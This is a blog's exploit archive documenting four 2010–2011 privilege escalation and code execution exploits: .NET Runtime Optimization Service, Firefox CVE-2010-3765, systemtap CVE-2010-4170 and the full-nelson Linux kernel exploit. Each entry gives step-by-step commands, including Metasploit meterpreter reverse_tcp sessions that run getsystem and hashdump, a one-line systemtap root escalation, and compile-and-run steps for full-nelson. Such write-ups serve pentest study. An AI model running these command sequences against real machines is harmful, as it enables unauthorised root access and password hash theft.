Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation

Exploits, Metasploit, ,

Timeline :

Vulnerability disclosed by XenoMuta on Exploit-DB the 2011-03-08
Metasploit PoC provided by David Rude the 2011-03-08

PoC provided by :

XenoMuta
David Rude

Reference(s) :

EDB-ID-16940
OSVDB-71013

Affected version(s) :

Microsoft .NET Framework include 4.0 and 2.0

Tested on Windows XP SP3 with :

With Microsoft.NET Framework v2.0.50727 mscorsvw.exe

Description :

This module attempts to exploit the security permissions set on the .NET Runtime Optimization service. Vulnerable versions of the .NET Framework include 4.0 and 2.0. The permissions on this service allow domain users and local power users to modify the mscorsvw.exe binary. Seem to work on Windows XP SP3, 2003 R2 & 7.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
getuid
getsystem
hashdump
ps
migrate xxxx
background

use post/windows/escalate/net_runtime_modify
info
show options
set LHOST 192.168.178.21
set LPORT 4445
set SESSION 1
exploit

sessions -i 2
getuid
hashdump

CVE-2010-3765 : Mozilla Firefox Interleaving document.write and appendChild Exploit

Exploits, Metasploit,

Timeline :

Vulnerability discovered in the wild
Vulnerability corrected by vendor the 2010-10-27
Vulnerability & Exploit-DB PoC disclosed by unknown the 2010-10-29
Metasploit PoC released the 2011-02-17

PoC provided by :

unknown
scriptjunkie

Reference(s) :

CVE-2010-3765
MFSA 2010-73
EDB-ID-15352
OSVDB-ID-68905

Affected version(s) :

All Firefox 3.6.x versions previous version 3.6.12
All Firefox 3.5.x versions previous version 3.5.15
All Thunderbird 3.1.x versions previous version 3.1.6
All Thunderbird 3.0.x versions previous version 3.0.10
All SeaMonkey 2.0.x versions previous version 2.0.10

Tested on Windows XP SP3 with :

Firefox 3.6.9 released the 2010-09-23

Description :

This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. This exploit is a metasploit port of the in-the-wild exploit.

Commands :

use exploit/windows/browser/mozilla_interleaved_write
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

CVE-2010-4170 : systemtap Local Root Privilege Escalation Vulnerability

Exploits,

Timeline :

Vulnerability reported to vendors, by Tavis Ormandy, the 2010-11-15
Vulnerability corrected by vendors around the 2010-11-17

PoC provided by :

Tavis Ormandy

Reference(s) :

CVE-2010-4170

Affected version(s) :

Red Hat, Fedora, Debian, Ubuntu, etc.

Tested on Debian squeeze/sid with :

systemtap-runtime_1.0-2_i386.deb

Description :

It was discovered that staprun did not properly sanitize the environment before executing the modprobe command to load an additional kernel module. A local, unprivileged user could use this flaw to escalate their privileges.

Commands :

Require “systemtap-runtime” on Debian

id
printf “install uprobes /bin/sh” exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u whatever
id

full-nelson.c Linux Kernel local privilege escalation

Exploits,

Timeline :

CVE-2010-3849 reported by Nelson Elhagethe the 2010-10-18
CVE-2010-3850 reported by Nelson Elhagethe the 2010-10-18
CVE-2010-4258 reported by Nelson Elhagethe the 2010-12-02

PoC provided by :

Dan Rosenberg
Nelson Elhage

Reference(s) :

CVE-2010-3849
CVE-2010-3850
CVE-2010-4258

Affected version(s) :

All Linux Kernel versions previous to the 2.6.37 version

Tested on Ubuntu 10.10 server

Description :

This exploit leverages three vulnerabilities to get root, all of which were discovered by Nelson Elhage.

Commands :

uname -a
uid
gcc full-nelson.c -o full-nelson
./full-neslon
uid